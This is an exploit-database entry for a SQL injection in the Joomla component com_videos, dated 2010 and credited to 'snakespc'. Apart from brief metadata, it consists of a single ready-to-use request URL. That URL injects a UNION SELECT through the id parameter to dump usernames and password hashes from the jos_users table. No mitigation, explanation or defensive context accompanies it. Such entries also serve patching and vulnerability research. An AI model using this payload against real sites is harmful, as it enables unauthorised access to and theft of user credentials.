Joomla! Component com_videos - SQL Injection

EDB-ID:

11449

CVE:

N/A


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2010-02-14


http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users

Snakespc